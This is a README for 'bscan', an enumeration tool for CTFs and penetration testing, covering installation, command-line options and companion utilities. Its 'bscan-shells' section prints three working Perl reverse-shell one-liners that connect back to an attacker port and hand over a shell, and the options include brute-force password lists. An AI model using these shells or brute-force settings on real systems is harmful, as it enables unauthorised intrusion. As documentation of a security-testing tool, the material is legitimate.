
an asynchronous target enumeration tool


`bscan` is a command-line utility to perform active information gathering and service enumeration. At its core, `bscan` asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.


`bscan` is intended for educational purposes and events such as CTFs only and should never be run on machines and/or networks without explicit prior consent. This code is released under the MIT license.


`bscan` was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed. There are a few different types of packaged releases and ways to install them.

The easiest way to get up and running is to install the appropriate single-file executable version of the program for your operating system (no Python installation required):

```sh
# on Linux (i.e., Kali)
wget -O bscan

# on Windows
powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; wget '' -OutFile 'bscan.exe'"

# to download a specific version, use the following pattern
wget -O bscan
```

You can also download the latest packaged version from PyPI (note that this requires an existing Python 3.6+ installation):

pip install bscan

Similarly, you could get the bleeding-edge version from version control:

pip install

Basic Usage

`bscan` has a wide variety of configuration options which can be used to tune scans to your needs. Here's a quick example:

```sh
$ bscan \
    --max-concurrency 3 \
    --patterns [Mm]icrosoft \
    --status-interval 10 \
    --verbose-status \
```

What's going on here?

* `--max-concurrency 3` means that no more than 3 concurrent scan subprocesses will be run at a time
* `--patterns [Mm]icrosoft` defines a custom regex pattern with which to highlight matches in the generated scan output
* `--status-interval 10` tells `bscan` to print runtime status updates every 10 seconds
* `--verbose-status` means that each of these status updates will print details of all currently-running scan subprocesses
* the trailing `targets` argument is the host upon which we want to enumerate

`bscan` also relies on some additional configuration files. The default files can be found in the `bscan/configuration/` directory and serve the following purposes:

* specifying the regex patterns to be highlighted in console output when matched with scan output
* specifying the installed programs that `bscan` plans on using
* defining the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan output
* defining the scans to be run on the target(s) on a per-service basis
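
To make the `--max-concurrency`, `--patterns` and port-parsing behaviour described above concrete, here is an added sketch; it is not bscan's own code. The names `run_limited`, `parse_open_ports`, `highlight` and `PORT_RE` are hypothetical, the scan output is constructed, and the "scanners" are harmless child Python processes that only print that sample.

```python
import asyncio
import re
import sys

# Constructed nmap-style output for illustration; not real scan results.
SAMPLE_OUTPUT = """\
80/tcp   open   http          Microsoft IIS httpd 10.0
445/tcp  open   microsoft-ds  Windows Server 2016
8080/tcp closed http-proxy
"""
# Assumed port-scan regex: port number and service name of each open TCP port.
PORT_RE = re.compile(r"^(?P<port>\d+)/tcp\s+open\s+(?P<service>\S+)", re.M)

def parse_open_ports(output):
    """Return {service: [ports]} for every open port in the scan output."""
    found = {}
    for m in PORT_RE.finditer(output):
        found.setdefault(m["service"], []).append(int(m["port"]))
    return found

def highlight(text, patterns):
    """Wrap each match of the user-supplied regexes in ANSI bold red."""
    combined = re.compile("|".join(f"(?:{p})" for p in patterns))
    return combined.sub(lambda m: f"\033[1;31m{m.group(0)}\033[0m", text)

async def run_limited(commands, max_concurrency):
    """Run argv lists as subprocesses, at most max_concurrency at a time."""
    sem = asyncio.Semaphore(max_concurrency)
    running = peak = 0
    async def run_one(argv):
        nonlocal running, peak
        async with sem:  # waits here while max_concurrency children are alive
            running += 1
            peak = max(peak, running)
            proc = await asyncio.create_subprocess_exec(
                *argv, stdout=asyncio.subprocess.PIPE)
            out, _ = await proc.communicate()
            running -= 1
            return out.decode()
    outputs = await asyncio.gather(*(run_one(c) for c in commands))
    return outputs, peak

def demo():
    cmd = [sys.executable, "-c", f"print({SAMPLE_OUTPUT!r}, end='')"]  # stand-in scanner
    outputs, peak = asyncio.run(run_limited([cmd] * 6, max_concurrency=3))
    return parse_open_ports(outputs[0]), peak

if __name__ == "__main__":
    print(highlight(SAMPLE_OUTPUT, ["[Mm]icrosoft"]), demo())
```

Six stand-in jobs are queued, but the semaphore keeps the observed peak at three, and the closed port is ignored by the parsing regex.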

Detailed Options

Here's what you should see when running `bscan --help`:

```
usage: bscan [OPTIONS] targets

an asynchronous service enumeration tool

positional arguments:
  targets               the targets and/or networks on which to perform
                        enumeration

optional arguments:
  -h, --help            show this help message and exit
  --brute-pass-list F   filename of password list to use for brute-forcing
  --brute-user-list F   filename of user list to use for brute-forcing
  --cmd-print-width I   the maximum integer number of characters allowed when
                        printing the command used to spawn a running
                        subprocess (defaults to 80)
  --config-dir D        the base directory from which to load the
                        configuration files; required configuration files
                        missing from this directory will instead be loaded
                        from the default files shipped with this program
  --hard                force overwrite of existing directories
  --max-concurrency I   maximum integer number of subprocesses permitted to be
                        running concurrently (defaults to 20)
  --no-program-check    disable checking the presence of required system
                        programs
  --no-file-check       disable checking the presence of files such as
                        configured wordlists
  --no-service-scans    disable running scans on discovered services
  --output-dir D        the base directory in which to write output files
  --patterns [ [ ...]]  regex patterns to highlight in output text
  --ping-sweep          enable ping sweep filtering of hosts from a network
                        range before running more intensive scans
  --quick-only          whether to only run the quick scan (and not include
                        the thorough scan over all ports)
  --qs-method S         the method for performing the initial TCP port scan;
                        must correspond to a configured port scan
  --status-interval I   integer number of seconds to pause in between printing
                        status updates; a non-positive value disables updates
                        (defaults to 30)
  --ts-method S         the method for performing the thorough TCP port scan;
                        must correspond to a configured port scan
  --udp                 whether to run UDP scans
  --udp-method S        the method for performing the UDP port scan; must
                        correspond to a configured port scan
  --verbose-status      whether to print verbose runtime status updates, based
                        on frequency specified by `--status-interval` flag
  --version             program version
  --web-word-list F     the wordlist to use for scans
```

Companion Tools

The main `bscan` program ships with two utility programs (`bscan-wordlists` and `bscan-shells`) to make your life a little easier when looking for wordlists and trying to open reverse shells.

`bscan-wordlists` is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here's a simple example:

```sh
$ bscan-wordlists --find "*win*"
```

Try `bscan-wordlists --help` to explore other options.

`bscan-shells` is a program that will generate a variety of reverse shell one-liners with fields populated for you. Here's a simple example to list all Perl-based shells, configured to connect back on port `443`:

```sh
$ bscan-shells --port 443 | grep -i -A1 perl
perl for windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl with /bin/sh
perl -e 'use Socket;$i="";$p=443;socket(S,PFINET,SOCKSTREAM,getprotobyname("tcp"));if(connect(S,sockaddrin($p,inetaton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl without /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```

Note that `bscan-shells` pulls these commands from the [`reverse-shells.toml`](bscan/configuration/reverse-shells.toml) configuration file. Try `bscan-shells --help` to explore other options.


Start by setting up a new development environment and installing the requirements (using `mkvirtualenv` and `workon`):

```sh
# setup the environment
mkvirtualenv -p $(which python3) bscan-dev
workon bscan-dev

# get the deps
pip install -r dev-requirements.txt
```

Lint and type-check the project (these are run on Travis, too):

flake8 . && mypy bscan

When it's time to package a new release:

```sh
# build the single-file executable
pyinstaller bscan.spec

# build source and wheel distributions
python setup.py bdist_wheel sdist

# run post-build checks
twine check dist/*

# upload to PyPI
twine upload dist/*
```
